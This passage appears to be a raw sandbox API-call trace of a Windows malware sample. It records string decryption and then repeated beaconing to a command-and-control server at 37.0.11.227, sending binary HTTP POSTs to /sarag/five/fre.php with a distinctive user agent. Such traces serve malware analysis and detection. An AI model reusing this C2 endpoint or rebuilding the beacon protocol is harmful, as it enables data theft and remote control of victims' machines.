[0276.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.094] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.094] GetProcessHeap () returned 0x690000 [0276.095] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0276.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.113] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0276.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.114] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0276.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.115] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0276.115] GetProcessHeap () returned 0x690000 [0276.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0276.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.116] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.118] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.119] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.120] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.120] GetProcessHeap () returned 0x690000 [0276.120] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0276.120] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.121] GetProcessHeap () returned 0x690000 [0276.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0276.121] GetProcessHeap () returned 0x690000 [0276.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.123] GetProcessHeap () returned 0x690000 [0276.123] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0276.124] GetProcessHeap () returned 0x690000 [0276.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0276.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.124] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.129] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0276.136] GetProcessHeap () returned 0x690000 [0276.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0276.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.137] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0276.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.138] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.139] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.139] GetProcessHeap () returned 0x690000 [0276.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0276.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.141] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0276.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.142] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0276.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.143] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0276.143] GetProcessHeap () returned 0x690000 [0276.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0276.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.144] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0276.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.144] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0276.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.145] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0276.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.146] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0276.146] GetProcessHeap () returned 0x690000 [0276.146] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0276.147] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0276.147] GetProcessHeap () returned 0x690000 [0276.147] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0276.147] socket (af=2, type=1, protocol=6) returned 0x86c [0276.147] connect (s=0x86c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0276.175] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0276.175] GetProcessHeap () returned 0x690000 [0276.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0276.175] GetProcessHeap () returned 0x690000 [0276.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0276.176] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0276.177] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0276.177] GetProcessHeap () returned 0x690000 [0276.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0276.177] GetProcessHeap () returned 0x690000 [0276.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0276.178] GetProcessHeap () returned 0x690000 [0276.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0276.178] GetProcessHeap () returned 0x690000 [0276.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0276.179] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0276.179] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0276.179] GetProcessHeap () returned 0x690000 [0276.180] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0276.180] GetProcessHeap () returned 0x690000 [0276.180] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0276.181] send (s=0x86c, buf=0x6ad508*, len=242, flags=0) returned 242 [0276.182] send (s=0x86c, buf=0x6aba40*, len=159, flags=0) returned 159 [0276.182] GetProcessHeap () returned 0x690000 [0276.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0276.182] recv (in: s=0x86c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0276.257] GetProcessHeap () returned 0x690000 [0276.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0276.258] GetProcessHeap () returned 0x690000 [0276.259] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0276.259] GetProcessHeap () returned 0x690000 [0276.259] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0276.259] GetProcessHeap () returned 0x690000 [0276.259] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0276.259] closesocket (s=0x86c) returned 0 [0276.260] GetProcessHeap () returned 0x690000 [0276.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0276.260] GetProcessHeap () returned 0x690000 [0276.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.261] GetProcessHeap () returned 0x690000 [0276.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0276.261] GetProcessHeap () returned 0x690000 [0276.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0276.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1628) returned 0x86c [0276.267] Sleep (dwMilliseconds=0xea60) [0276.269] GetProcessHeap () returned 0x690000 [0276.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0276.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.270] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.280] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0276.288] GetProcessHeap () returned 0x690000 [0276.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0276.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.291] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0276.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.292] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.293] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.293] GetProcessHeap () returned 0x690000 [0276.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0276.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.296] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0276.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.297] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0276.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.298] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0276.298] GetProcessHeap () returned 0x690000 [0276.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0276.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.299] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.301] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.302] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.303] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.303] GetProcessHeap () returned 0x690000 [0276.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0276.303] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.303] GetProcessHeap () returned 0x690000 [0276.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0276.304] GetProcessHeap () returned 0x690000 [0276.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.304] GetProcessHeap () returned 0x690000 [0276.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0276.305] GetProcessHeap () returned 0x690000 [0276.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0276.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0276.317] GetProcessHeap () returned 0x690000 [0276.317] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0276.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.318] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0276.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.319] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.320] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.320] GetProcessHeap () returned 0x690000 [0276.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0276.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.324] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0276.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.325] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0276.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.325] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0276.325] GetProcessHeap () returned 0x690000 [0276.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0276.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.326] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0276.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.327] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0276.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.328] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0276.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.329] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0276.329] GetProcessHeap () returned 0x690000 [0276.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0276.329] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0276.329] GetProcessHeap () returned 0x690000 [0276.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0276.329] socket (af=2, type=1, protocol=6) returned 0x870 [0276.330] connect (s=0x870, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0276.353] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0276.353] GetProcessHeap () returned 0x690000 [0276.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0276.353] GetProcessHeap () returned 0x690000 [0276.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0276.354] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0276.354] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0276.354] GetProcessHeap () returned 0x690000 [0276.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0276.354] GetProcessHeap () returned 0x690000 [0276.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0276.355] GetProcessHeap () returned 0x690000 [0276.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0276.355] GetProcessHeap () returned 0x690000 [0276.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0276.356] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0276.357] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0276.357] GetProcessHeap () returned 0x690000 [0276.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0276.357] GetProcessHeap () returned 0x690000 [0276.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0276.358] send (s=0x870, buf=0x6ad508*, len=242, flags=0) returned 242 [0276.359] send (s=0x870, buf=0x6aba40*, len=159, flags=0) returned 159 [0276.359] GetProcessHeap () returned 0x690000 [0276.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0276.359] recv (in: s=0x870, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0276.430] GetProcessHeap () returned 0x690000 [0276.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0276.431] GetProcessHeap () returned 0x690000 [0276.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0276.431] GetProcessHeap () returned 0x690000 [0276.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0276.432] GetProcessHeap () returned 0x690000 [0276.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0276.433] closesocket (s=0x870) returned 0 [0276.433] GetProcessHeap () returned 0x690000 [0276.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0276.433] GetProcessHeap () returned 0x690000 [0276.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.434] GetProcessHeap () returned 0x690000 [0276.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0276.434] GetProcessHeap () returned 0x690000 [0276.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0276.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x162c) returned 0x870 [0276.436] Sleep (dwMilliseconds=0xea60) [0276.437] GetProcessHeap () returned 0x690000 [0276.437] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0276.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.439] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.444] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0276.449] GetProcessHeap () returned 0x690000 [0276.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0276.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.450] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0276.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.451] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.452] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.452] GetProcessHeap () returned 0x690000 [0276.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0276.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.538] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0276.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.539] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0276.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.540] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0276.540] GetProcessHeap () returned 0x690000 [0276.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0276.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.541] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.542] 